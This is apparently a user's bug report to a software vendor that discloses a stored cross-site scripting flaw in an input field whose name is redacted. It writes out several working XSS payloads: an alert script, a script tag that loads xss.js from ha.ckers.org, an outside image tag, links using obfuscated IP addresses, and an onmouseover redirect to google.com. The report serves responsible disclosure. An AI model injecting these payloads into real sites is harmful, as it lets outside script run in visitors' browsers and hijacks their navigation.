Hi there,

i tested a little and found a bigger problem with XSS.
In XXXinfo-removedXXXXX a user could enter scripting like
<script>alert(1)</script>
and if you save it .... voila there goes your MessageBox.

Kindly fix this asap! I have not much time to test more stuff atm,
but i am sure there is a way to do more harm and inject stuff...

e.g. enter this for value!!!

<SCRIPT SRC=ha.ckers.org/xss.js></SCRIPT>

or:

<IMG SRC=www.bamigo-bamberg.net/wp-content/uploads/anonymous.png>

leads to attached picture:



<A HREF="173.194.69.94/">XSS</A>

Will set a link to google....
as well as: <A HREF="0xad.0xc2.0x45.0x5e/">XSS</A>

and a last test: <h2 onmouseover=javascript:window.location="www.google.com";>test-hoverme

shows up like this and forces to open google.com on hover:





!!!Only posted to inform you & protect your fantastic product + its customers!!!